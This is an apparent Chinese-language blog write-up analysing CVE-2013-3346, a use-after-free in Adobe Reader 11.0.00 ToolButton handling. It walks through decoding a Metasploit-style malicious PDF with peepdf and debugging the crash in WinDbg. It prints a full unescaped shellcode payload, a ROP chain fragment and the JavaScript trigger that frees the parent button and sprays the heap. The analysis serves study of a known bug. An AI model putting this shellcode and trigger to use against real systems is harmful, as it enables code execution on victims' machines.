CVE-2013-3346-Adobe Reader ToolButton 释放重引用漏洞

前言

这是一个用于”Epic Turla”网络间谍攻击行动中的一个漏洞,PDF的漏洞

漏洞分析

环境

win7 sp1 32位
windbg
ida
peepdf
adobe reader 11.0.00

ftp://ftp.adobe.com/pub/adobe/reader/win/11.x/11.0.00/zh_CN/AdbeRdr11000_zh_CN.exe

安装peepdf

1
pip install peepdf

-i开启交互模式

1
peepdf -i ./msf.pdf

结果并不是很好使

我们直接复制下面 Q=开始的东西到一个文件里面

之后即可解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PPDF> js_jjdecode file jjencode.txt

var shellcode = unescape("%u00E8%u0000%u5D00%uED83%uE905%u008B%u0000%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u31C3%u64D2%u528B%u8B30%u0C52%u528B%uB114%u8B01%u2872%u17BB%u2BCA%uE86E%uFF5A%uFFFF%u5A8B%u8B10%u7512%u31EC%uB1C9%u680E%uFA7C%u1596%uE668%u785C%u680F%u937D%uBDFA%u2068%uEA96%u6895%uBE1B%u1A09%uDA68%u7A8B%u68AE%u6CEF%uE688%u6868%u88F6%u680D%u4676%u8A8B%uCA68%u2A6A%u6895%u0B95%u1A7F%u4568%u9E3C%u6857%uBE1C%u302E%u4E68%uDFCC%u8912%uE8E6%uFF28%uFFFF%uBD8D%u040E%u0000%u0C6A%u8059%uC837%uE247%u6AFA%u686C%u746E%u6C64%uFF54%u1456%uF883%u0F00%uD484%u0001%u5600%uC931%u8941%u68C3%uFD91%u5947%uE689%uF3E8%uFFFE%u6AFF%u8901%u68E7%u2000%u0000%uE189%u406A%u0068%u1030%u5100%u006A%u6A57%uFFFF%u5916%u5E59%u835E%u00F8%u850F%u019B%u0000%u90B0%u89FC%uB9CF%u0EF5%u0000%uAAF3%uB956%u010B%u0000%uB58D%u0303%u0000%uA4F3%uFF5E%u1056%u0789%u858D%u040E%u0000%u006A%u006A%u036A%u006A%u006A%u006A%uFF50%u0C56%uF883%u0F00%u5C84%u0001%u8900%u6AC7%u6804%u1000%u0000%u0068%u0004%u6A00%uFF00%u0456%uF883%u0F00%u4084%u0001%uC700%u1440%u0125%u0703%u40C7%uAD1C%u0000%uC700%u2C40%u0020%u0000%u40C7%u0430%u0000%uC700%u3840%uBEEF%uDEAD%u006A%uE289%u006A%u6852%u0080%u0000%u6850%u0400%u0000%u6850%u23C8%u8FFF%uFF57%u0856%uDB31%u5255%uE789%u8352%u04C3%uC031%u5050%u5350%u56FF%u8334%uFFF8%uEF74%uC031%u5350%u56FF%u832C%uFFF8%uE374%u003D%u0010%u7C00%u89DC%u89C5%u31E0%u51C9%u6A50%u5704%uFF53%u3056%u3F81%u5025%u4644%uC575%uC483%u8908%u5DEF%uEF83%u6A04%u6804%u1000%u0000%u6A57%uFF00%u0456%uC931%u5150%u5754%u5350%u56FF%u5830%uF989%uD231%uFA80%u7401%u8111%uF238%u0909%u750A%u831E%u04C0%uC2FE%u8950%u57FB%u5256%u8950%u89C6%u29DA%u89FA%uF6D0%u28E2%u8006%uF336%u5A58%u405E%uE24F%u5FD1%u8158%uC8EC%u0000%u8900%u83E3%u0CEC%u5350%uC868%u0000%uFF00%u2456%u438D%u31FC%u89C9%u5308%u5051%uFF53%u2856%u43C7%u2FFC%u2063%uC720%uF843%u6D63%u2064%u8958%u31C5%u51C9%u6A51%u5102%u6851%u0000%u4000%uFF53%u0C56%uEB83%u5308%uC389%uC931%u8951%u51E0%u5750%u5355%u56FF%u531C%u56FF%u5820%u315B%u6AC0%u5300%u56FF%uFF18%u6016%u00E8%u0000%u5B00%uEB83%u8B06%u004D%u498B%u8104%u00E1%uFFF0%u66FF%u3981%u5A4D%u840F%u0093%u0000%uE981%u1000%u0000%uEDEB%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u89C3%u89DD%u31CB%u41C9%u7468%uACC9%u894A%uE8E6%uFF88%uFFFF%u006A%uE789%u8B57%u0B85%u0001%u5000%u16FF%u835F%u00F8%u2675%u006A%uE089%u6A50%uFF04%u5E16%uF883%u7500%u8117%uC8C6%u0000%u8100%uC8C7%u0000%u8B00%u8906%uC707%u6C47%u0000%u0000%u6158%u01B8%u0001%uC200%u0004%u9494%u94E6%u8C86%uBA98%uB0A7%uC8B1");
var executable = "";
var rop9 = "";
rop9 += unescape("%u313d%u4a82");
rop9 += unescape("%ua713%u4a82");
rop9 += unescape("%u1f90%u4a80");
rop9 += unescape("%u9038%u4a84");
rop9 += unescape("%u7e7d%u4a80");
rop9 += unescape("%uffff%uffff");
......
......
......
......
省略

那我们分析js,基本也能分析出个东西,除了对喷射,主要的代码就几条

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
app.addToolButton({
cName: "evil",
cExec: "1",
cEnable: "addButtonFunc();"
}); // 创建evil Button并设置回调函数addButtonFunc

addButtonFunc = function() {
app.addToolButton({cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();"});
} // 创建子Buton xxx,设置了回调函数removeButtonFunc

removeButtonFunc = function() {
app.removeToolButton({cName: "evil"}); // 删除父对象,由于子对象还有父对象的引用,导致的uaf

for (i=0;i < 10;i++)
arr[i] = part1.concat(part2);
}

调试

我们调试看看,打开的时候最好把保护模式关掉(第一次开启的时候应该会问你),不然我也不知道行不行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(95c.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08a8 ebx=00000001 ecx=0891fe18 edx=000011c4 esi=0891fe18 edi=00000000
eip=4a82f129 esp=0023e51c ebp=0023e540 iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
4a82f129 ?? ???
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0023e518 6219e85d bb5ba807 00000001 0891fe18 0x4a82f129
0023e540 6219e0d2 00000000 0891fe18 00000000 AcroRd32!DllCanUnloadNow+0x150536
0023e564 6219f3e3 0023e5b8 6219d996 6219f409 AcroRd32!DllCanUnloadNow+0x14fdab
0023e56c 6219d996 6219f409 08706f18 bb5ba8ff AcroRd32!DllCanUnloadNow+0x1510bc
0023e5b8 6219c68c 00000000 bb5ba8af 08706f18 AcroRd32!DllCanUnloadNow+0x14f66f
0023e5e8 6219c50e 086fabb8 04d6b090 bb5bab3f AcroRd32!DllCanUnloadNow+0x14e365
0023e678 6219c206 08706f18 09729c48 0023e694 AcroRd32!DllCanUnloadNow+0x14e1e7
0023e688 6219c1a1 08706f18 0023e6c0 620f712e AcroRd32!DllCanUnloadNow+0x14dedf
0023e694 620f712e 08706f18 04d6b090 bb5bab87 AcroRd32!DllCanUnloadNow+0x14de7a
0023e6c0 6219ae0e 62b4cfb8 ffffffff 09729c30 AcroRd32!DllCanUnloadNow+0xa8e07
0023e6f0 62196d1d 00000001 0023e6c8 6219c193 AcroRd32!DllCanUnloadNow+0x14cae7
0023e714 62196bf1 000006c4 04d6b090 096ea780 AcroRd32!DllCanUnloadNow+0x1489f6
0023e72c 6219434c 04d6b090 bb5baa83 00000000 AcroRd32!DllCanUnloadNow+0x1488ca
0023e7c4 6204e440 00000000 04d6b090 00000000 AcroRd32!DllCanUnloadNow+0x146025
0023e7f0 62193a64 bb5ba55f 000006c4 086fabb8 AcroRd32!DllCanUnloadNow+0x119
0023e818 625f38ef 087dbde8 00000000 086fabb8 AcroRd32!DllCanUnloadNow+0x14573d
0023e894 625f3b7c 04e51dd0 00000001 086a2588 AcroRd32!CTJPEGRotateOptions::operator=+0xff7d3

我们看看前面调用的是什么,可以看劫持控制流的eax来源于esi

1
2
3
4
5
6
7
8
9
10
0:000> ub 6219e85d 
AcroRd32!DllCanUnloadNow+0x150518:
6219e83f 897dfc mov dword ptr [ebp-4],edi
6219e842 ff96d0020000 call dword ptr [esi+2D0h]
6219e848 0fb7d8 movzx ebx,ax
6219e84b 8b06 mov eax,dword ptr [esi]
6219e84d 59 pop ecx
6219e84e 8bce mov ecx,esi
6219e850 66899ecc020000 mov word ptr [esi+2CCh],bx
6219e857 ff9064030000 call dword ptr [eax+364h]

我们看看esi,这里由于堆喷已经占位了,所以是busy,这里也可以看到大小是0x370

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:000> !heap -p -a esi
address 0891fe18 found in
_HEAP @ 2570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0891fe10 0071 0000 [00] 0891fe18 00370 - (busy)


0:000> dd esi
0891fe18 0c0c08a8 41414141 41414141 41414141
0891fe28 41414141 41414141 41414141 41414141
0891fe38 41414141 41414141 41414141 41414141
0891fe48 41414141 41414141 41414141 41414141
0891fe58 41414141 41414141 41414141 41414141
0891fe68 41414141 41414141 41414141 41414141
0891fe78 41414141 41414141 41414141 41414141
0891fe88 41414141 41414141 41414141 41414141

懒得找纯正的poc了,不然更能精准看到是uaf

自愿打赏专区